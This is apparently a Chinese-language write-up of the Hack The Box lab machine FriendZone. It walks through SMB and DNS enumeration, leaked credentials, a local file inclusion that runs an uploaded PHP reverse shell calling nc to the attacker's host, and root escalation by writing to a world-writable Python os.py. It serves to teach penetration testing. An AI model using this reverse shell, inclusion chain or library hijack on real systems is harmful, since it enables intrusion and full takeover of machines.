Hackthebox - FriendZone

靶场信息

靶场类型

信息收集

Nmap

┌──(root㉿lucifiel)-[~/Desktop]
└─# nmap -sS -sC -sV -A -p- --min-rate 5000 10.10.10.123
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-09 13:14 CST
Nmap scan report for 10.10.10.123
Host is up (0.27s latency).
Not shown: 65528 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_http-title: 404 Not Found
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=9/9%OT=21%CT=1%CU=36793%PV=Y%DS=2%DC=T%G=Y%TM=631ACC10
OS:%P=aarch64-unknown-linux-gnu)SEQ(SP=101%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=
OS:A)OPS(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M5
OS:39ST11NW7%O6=M539ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=712
OS:0)ECN(R=Y%DF=Y%T=40%W=7210%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=
OS:)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%
OS:A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%
OS:DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=
OS:40%CD=S)

Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h00m00s, deviation: 1h43m54s, median: -1s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2022-09-09T08:15:47+03:00
| smb2-time: 
|   date: 2022-09-09T05:15:49
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

TRACEROUTE (using port 3306/tcp)
HOP RTT       ADDRESS
1   277.35 ms 10.10.14.1
2   277.61 ms 10.10.10.123

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.57 seconds

Http

就一张静态图片,肯定不在这里了

Ftp

┌──(root㉿lucifiel)-[~/Desktop]
└─# ftp 10.10.10.123
Connected to 10.10.10.123.
220 (vsFTPd 3.0.3)
Name (10.10.10.123:root): anonymous
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed

本台不允许 ftp 匿名登陆

┌──(root㉿lucifiel)-[~/Desktop]
└─# searchsploit vsftpd 3.0.3
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service                                                                                                                                                                   | multiple/remote/49719.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploit-DB 也只找到一个远程DDOS的漏洞,没什么实际意义

Samba

┌──(root㉿lucifiel)-[~/Desktop]
└─# smbmap -H 10.10.10.123
[+] Guest session       IP: 10.10.10.123:445    Name: 10.10.10.123                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        Files                                                   NO ACCESS       FriendZone Samba Server Files /etc/Files
        general                                                 READ ONLY       FriendZone Samba Server Files
        Development                                             READ, WRITE     FriendZone Samba Server Files
        IPC$                                                    NO ACCESS       IPC Service (FriendZone server (Samba, Ubuntu))
┌──(root㉿lucifiel)-[~/Desktop]
└─# smbclient --list 10.10.10.123 -U ""  
Password for [WORKGROUP\]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        Files           Disk      FriendZone Samba Server Files /etc/Files
        general         Disk      FriendZone Samba Server Files
        Development     Disk      FriendZone Samba Server Files
        IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            FRIENDZONE
┌──(root㉿lucifiel)-[~/Desktop]
└─# nmap -p 445 --script=smb-enum-shares 10.10.10.123
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-20 09:50 CST
Nmap scan report for 10.10.10.123
Host is up (1.2s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.10.123\Development: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\Files: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.123\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\general: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 95.19 seconds
┌──(root㉿lucifiel)-[~/Desktop]
└─# smbclient -N \\\\10.10.10.123\\Development
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Sep 20 09:51:26 2022
  ..                                  D        0  Tue Sep 13 22:56:24 2022

                3545824 blocks of size 1024. 1658488 blocks available

四大常用指令挨个执行一遍,拿到的信息越多越好

Development 文件夹是空的,看看另一个有读取权限的文件夹

┌──(root㉿lucifiel)-[~/Desktop]
└─# smbclient -N \\\\10.10.10.123\\general
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jan 17 04:10:51 2019
  ..                                  D        0  Tue Sep 13 22:56:24 2022
  creds.txt                           N       57  Wed Oct 10 07:52:42 2018

                3545824 blocks of size 1024. 1658484 blocks available

这边有一个 creds.txt 文件,读取看一下

creds for the admin THING:

admin:WORKWORKHhallelujah@#

似乎是一个账号密码

漏洞利用

我们回到 Http 页面,会看到有一个邮箱 info@friendzoneportal.red

既然是域名邮箱,那按照常理来说是会存在这个域名的

查看了一下证书,发现确实存在域名,但是是 friendzone.red,去添加一个 hosts 解析

echo 10.10.10.123 friendzone.red >> /etc/hosts
┌──(root㉿lucifiel)-[~/Desktop]
└─# dig axfr friendzone.red @10.10.10.123

; <<>> DiG 9.18.1-1-Debian <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.         604800  IN      AAAA    ::1
friendzone.red.         604800  IN      NS      localhost.
friendzone.red.         604800  IN      A       127.0.0.1
administrator1.friendzone.red. 604800 IN A      127.0.0.1
hr.friendzone.red.      604800  IN      A       127.0.0.1
uploads.friendzone.red. 604800  IN      A       127.0.0.1
friendzone.red.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 1439 msec
;; SERVER: 10.10.10.123#53(10.10.10.123) (TCP)
;; WHEN: Tue Sep 20 10:09:07 CST 2022
;; XFR size: 8 records (messages 1, bytes 289)

枚举域名信息,发现了三个子域名

administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red

都添加到 hosts

https://administrator1.friendzone.red/ 访问后发现是一个登陆页面

使用我们的账号密码进行登录

登陆成功,让我们访问 /dashboard.php

大概意思是说,这是一个用于朋友圈的智能照片脚本,但是这是一个初级的 php 开发人员写的代码,然后这个脚本还没经过测试,所以有一个参数被遗忘了,输入这个参数可以现实图片,默认是 image_id=a.jpg&pagename=timestamp

看到这参数构成,感觉存在 LFI(本地文件包含),然后在之前的 Development 处,感觉有点不对,一个可读写的地址却没有内容,应该是给我们上传的点。然后我们也知道它的绝对路径,去尝试上传到 Development,再去 LFI 读取试试

\\10.10.10.123\Development: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
<?php
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 4444 >/tmp/f');
?>

把 shell 写入到 php 文件,然后去上传

┌──(root㉿lucifiel)-[~/Desktop]
└─# smbclient //10.10.10.123/development -U ""
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> put shell.php 
putting file shell.php as \shell.php (0.1 kb/s) (average 0.1 kb/s)

然后去包含试试

nc -nvlp 4444
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell
┌──(root㉿lucifiel)-[~/Desktop]
└─# nc -nvlp 4444                                    
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.123] 39570
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')";
www-data@FriendZone:/var/www/admin$ whoami&&id
whoami&&id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

成功获得 shel

www-data@FriendZone:/home/friend$ cat user.txt
cat user.txt
a4977797fce2cc139c86af2adc340a29

成功拿到 user 权限的 flag 文件

权限提升

User

www-data@FriendZone:/var/www$ ls
ls
admin       friendzoneportal       html             uploads
friendzone  friendzoneportaladmin  mysql_data.conf
www-data@FriendZone:/var/www$ cat mysql_data.conf
cat mysql_data.conf
for development process this is the mysql creds for user friend

db_user=friend

db_pass=Agpyu12!0.213$

db_name=FZ

在登入后的目录找到了一个 mysql_data.conf 文件,里面包含了一些凭证

ww-data@FriendZone:/var/www$ cat /etc/passwd|grep bash
cat /etc/passwd|grep bash
root:x:0:0:root:/root:/bin/bash
friend:x:1000:1000:friend,,,:/home/friend:/bin/bash

可以看到当前也有这个用户,去尝试 ssh 登陆试试

┌──(root㉿lucifiel)-[~/Desktop]
└─# ssh friend@10.10.10.123
The authenticity of host '10.10.10.123 (10.10.10.123)' can't be established.
ED25519 key fingerprint is SHA256:ERMyoo9aM0mxdTvIh0kooJS+m3GwJr6Q51AG9/gTYx4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.123' (ED25519) to the list of known hosts.
friend@10.10.10.123's password: 
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

You have mail.
Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3
friend@FriendZone:~$ whoami&&id
friend
uid=1000(friend) gid=1000(friend) groups=1000(friend),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)

登入成功

Root

使用 pspy64 跑一下

2022/09/20 05:44:01 CMD: UID=0    PID=1417   | /bin/sh -c /opt/server_admin/reporter.py 
2022/09/20 05:44:01 CMD: UID=0    PID=1416   | /bin/sh -c /opt/server_admin/reporter.py

发现有一个脚本 /opt/server_admin/reporter.py 一直在运行

friend@FriendZone:~$ ls -la /opt/server_admin/reporter.py
-rwxr--r-- 1 root root 424 Jan 16  2019 /opt/server_admin/reporter.py

并且还是 root 权限的

friend@FriendZone:~$ cat /opt/server_admin/reporter.py
#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer

我们没有写入权限,但是它会导入一个 os 库,咱们去查看一下是否有权限

friend@FriendZone:/usr/lib/python2.7$ ls -la|grep os.py
-rwxrwxrwx  1 root   root    25910 Jan 15  2019 os.py

咱们是有写入权限的,那就写入一段恶意程序就好了

echo "system('chmod +s /bin/bash')" >> os.py
friend@FriendZone:/usr/lib/python2.7$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1113504 Apr  4  2018 /bin/bash

等待两分钟,看到加上 s 权限后,就可以提权了

friend@FriendZone:/usr/lib/python2.7$ /bin/bash -p
bash-4.4# whoami&&id
root
uid=1000(friend) gid=1000(friend) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare),1000(friend)

成功提权到 root 权限

bash-4.4# cat /root/root.txt
d93cbc3ed65646042735f3ee312fe2c5

成功拿到 root 权限的 flag 文件